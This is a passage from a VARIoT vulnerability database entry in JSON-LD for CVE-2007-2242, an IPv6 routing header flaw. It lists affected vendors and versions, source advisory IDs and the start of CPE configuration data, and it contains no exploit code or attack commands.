iD8DBQFHE+PimqjQ0CJFipgRAprEAKCoEfNhoDZrxQng2IYqYumR/3zVvACeOoJQ 51R6ymKyEZNBb9xnSWE/E64= =QWz7 -----END PGP SIGNATURE-----


Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200704-0740",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.7,
        "vendor": "openbsd",
        "version": "3.9"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.7,
        "vendor": "openbsd",
        "version": "4.0"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "freebsd",
        "version": "6.2"
      },
      {
        "model": "ipv6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "ietf",
        "version": "*"
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "apple computer",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "fujitsu",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "internet initiative",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "openbsd",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "red hat",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "secure computing network security division",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "sun microsystems",
        "version": null
      },
      {
        "model": null,
        "scope": null,
        "trust": 0.8,
        "vendor": "rpath",
        "version": null
      },
      {
        "model": "router si-r series",
        "scope": null,
        "trust": 0.8,
        "vendor": "fujitsu",
        "version": null
      },
      {
        "model": "rt series",
        "scope": null,
        "trust": 0.8,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "freebsd",
        "version": "5.5"
      },
      {
        "model": "rhel desktop workstation",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5 (client)"
      },
      {
        "model": "gs3000",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "freebsd",
        "version": "6.1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "linux",
        "version": "2.6.20.9"
      },
      {
        "model": "seil/neu",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "internet initiative",
        "version": "ver.2.x 2.00 (belay) ~  2.32 (expedition)"
      },
      {
        "model": "gs4000",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "fitelnet-f series",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "furukawa electric",
        "version": "fitelnet-f80/f100/f120/f1000"
      },
      {
        "model": "ix2000 series",
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "gr4000",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "centrecom",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "allied telesis",
        "version": "(ipv6 all series that support"
      },
      {
        "model": "seil/plus",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "internet initiative",
        "version": "1.00 (snappy) ~  1.80 (splash)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "linux",
        "version": "2.6.21"
      },
      {
        "model": "si-r70brin",
        "scope": null,
        "trust": 0.8,
        "vendor": "fujitsu",
        "version": null
      },
      {
        "model": "seil/neu",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "internet initiative",
        "version": "atm 1.10 (pogo) ~  1.42 (rubberpatch9)"
      },
      {
        "model": "ix1000 series",
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "ix4100 series",
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "seil/turbo",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "internet initiative",
        "version": "1.00 (union) ~  1.80 (shiloh)"
      },
      {
        "model": "kernel",
        "scope": "lt",
        "trust": 0.8,
        "vendor": "linux",
        "version": "version"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5 (server)"
      },
      {
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "red hat",
        "version": "5.0 (client)"
      },
      {
        "model": "ix3000 series",
        "scope": null,
        "trust": 0.8,
        "vendor": "nec",
        "version": null
      },
      {
        "model": "seil/neu",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "internet initiative",
        "version": "ver.1.x 1.52 (inkknot) ~  1.97 (b age13)"
      },
      {
        "model": "gr2000",
        "scope": null,
        "trust": 0.8,
        "vendor": "hitachi",
        "version": null
      },
      {
        "model": "linux enterprise server 10.sp1",
        "scope": null,
        "trust": 0.6,
        "vendor": "suse",
        "version": null
      },
      {
        "model": "neu atm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "seil",
        "version": "1.10"
      },
      {
        "model": "linux mandrake x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "2007.0"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.3.8"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.1.1"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.2.5"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.3.2"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "10.3"
      },
      {
        "model": "multi network firewall",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "2.0"
      },
      {
        "model": "-stable",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "6.0"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.0.4"
      },
      {
        "model": "-stable",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "5.3"
      },
      {
        "model": "linux enterprise sdk sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "alpha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "5.0"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "5.1"
      },
      {
        "model": "-release",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "6.0"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.3.9"
      },
      {
        "model": "-release",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "5.2.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "rpath",
        "version": "1"
      },
      {
        "model": "corporate server x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "4.0"
      },
      {
        "model": "linux lts powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.1.2"
      },
      {
        "model": "-releng",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "5.1"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.3.4"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10.1x86"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netbsd",
        "version": "3.0.2"
      },
      {
        "model": "linux i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.10"
      },
      {
        "model": "-release",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "5.5"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.5"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.3.6"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.2.6"
      },
      {
        "model": "neu ver.",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "seil",
        "version": "1.x1.52"
      },
      {
        "model": "directory pro",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cosmicperl",
        "version": "10.0.3"
      },
      {
        "model": "neu ver.",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "seil",
        "version": "1.x1.97"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.2"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.3.1"
      },
      {
        "model": "linux mandrake x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "2007.1"
      },
      {
        "model": "airport extreme",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.1"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.3"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.2.1"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.4"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.6"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.2.7"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.03"
      },
      {
        "model": "enterprise linux desktop client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.1"
      },
      {
        "model": "turbo",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "seil",
        "version": "1.80"
      },
      {
        "model": "linux enterprise desktop 10.sp1",
        "scope": null,
        "trust": 0.3,
        "vendor": "suse",
        "version": null
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.8"
      },
      {
        "model": "linux foresight linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "foresight",
        "version": "1.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.9"
      },
      {
        "model": "rfc internet protocol version",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ietf",
        "version": "2460-60"
      },
      {
        "model": "linux enterprise sp1 debuginfo",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netbsd",
        "version": "3.0.1"
      },
      {
        "model": "linux lts i386",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.2.8"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.1.4"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.1.3"
      },
      {
        "model": "-stable",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "6.2"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netbsd",
        "version": "3.1"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.10"
      },
      {
        "model": "turbo",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "seil",
        "version": "1.18"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.3.7"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.2.4"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.2.2"
      },
      {
        "model": "-releng",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "5.4"
      },
      {
        "model": "linux sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.10"
      },
      {
        "model": "solaris 8 sparc",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "5.4-stable",
        "scope": null,
        "trust": 0.3,
        "vendor": "freebsd",
        "version": null
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "-stable",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "5.5"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.3.3"
      },
      {
        "model": "mac os",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.10"
      },
      {
        "model": "-release-p10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "6.1"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "2007.1"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.3.5"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.0"
      },
      {
        "model": "linux enterprise desktop sp1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10"
      },
      {
        "model": "turbo",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "seil",
        "version": "1.00"
      },
      {
        "model": "linux powerpc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.10"
      },
      {
        "model": "linux ppc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.7"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.1.5"
      },
      {
        "model": "financials server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "navision",
        "version": "3.0"
      },
      {
        "model": "-release",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "5.4"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.1"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.2.3"
      },
      {
        "model": "-release-p5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "6.0"
      },
      {
        "model": "linux mandrake",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandriva",
        "version": "2007.0"
      },
      {
        "model": "airport extreme",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "6.0.x"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netbsd",
        "version": "2.0"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.2"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.3"
      },
      {
        "model": "-release",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "6.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.3.8"
      },
      {
        "model": "corporate server x86 64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "3.0"
      },
      {
        "model": "-release",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "5.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.2.5"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netbsd",
        "version": "2.0.2"
      },
      {
        "model": "linux lts sparc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "6.06"
      },
      {
        "model": "neu ver.",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "seil",
        "version": "2.x2.32"
      },
      {
        "model": "corporate server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "4.0"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.0.1"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "5.2"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.1.1"
      },
      {
        "model": "solaris 8 x86",
        "scope": null,
        "trust": 0.3,
        "vendor": "sun",
        "version": null
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.3.2"
      },
      {
        "model": "neu ver.",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "seil",
        "version": "2.x2.00"
      },
      {
        "model": "-releng",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "5.2"
      },
      {
        "model": "-release/alpha",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "5.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.1.2"
      },
      {
        "model": "beta2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netbsd",
        "version": "4.0"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.3.9"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netbsd",
        "version": "2.0.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.5"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.3.6"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.2.6"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netbsd",
        "version": "2.0.4"
      },
      {
        "model": "enterprise linux server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "-release",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "5.2"
      },
      {
        "model": "plus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "seil",
        "version": "1.80"
      },
      {
        "model": "kernel",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "linux",
        "version": "2.6.20.9"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.3"
      },
      {
        "model": "-stable",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "6.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.4"
      },
      {
        "model": "-prerelease",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "5.4"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.6"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.2.7"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "5.3"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.2"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.0.2"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.3.1"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.0.3"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.8"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.2.1"
      },
      {
        "model": "-release-p14",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "5.0"
      },
      {
        "model": "airport extreme",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.2.1"
      },
      {
        "model": "-releng",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "5.3"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.1"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "netbsd",
        "version": "2.0.3"
      },
      {
        "model": "opensuse",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "s u s e",
        "version": "10.2"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.9"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.3.7"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.2.8"
      },
      {
        "model": "plus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "seil",
        "version": "1.00"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.1.4"
      },
      {
        "model": "enterprise linux desktop workstation client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "5"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.1.3"
      },
      {
        "model": "-release-p5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "5.1"
      },
      {
        "model": "-release",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "5.3"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.2.4"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.3.5"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.2.2"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "5.0"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.3.4"
      },
      {
        "model": "neu atm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "seil",
        "version": "1.42"
      },
      {
        "model": "corporate server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mandrakesoft",
        "version": "3.0"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.3.3"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "suse",
        "version": "10.1x86-64"
      },
      {
        "model": "mac os server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.10"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.1"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.0"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.2.3"
      },
      {
        "model": "neu atm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "seil",
        "version": "1.35"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.1.5"
      },
      {
        "model": "-releng",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "5.0"
      },
      {
        "model": "mac os server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.7"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.2"
      },
      {
        "model": "mac os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "x10.4.3"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "5.0.x"
      },
      {
        "model": "3.1 rc3",
        "scope": null,
        "trust": 0.3,
        "vendor": "netbsd",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#267289"
      },
      {
        "db": "BID",
        "id": "23615"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2007-000387"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200704-492"
      },
      {
        "db": "NVD",
        "id": "CVE-2007-2242"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:3.9:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  },
                  {
                    "cpe23Uri": "cpe:2.3:o:openbsd:openbsd:4.0:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:a:ietf:ipv6:*:*:*:*:*:*:*:*",
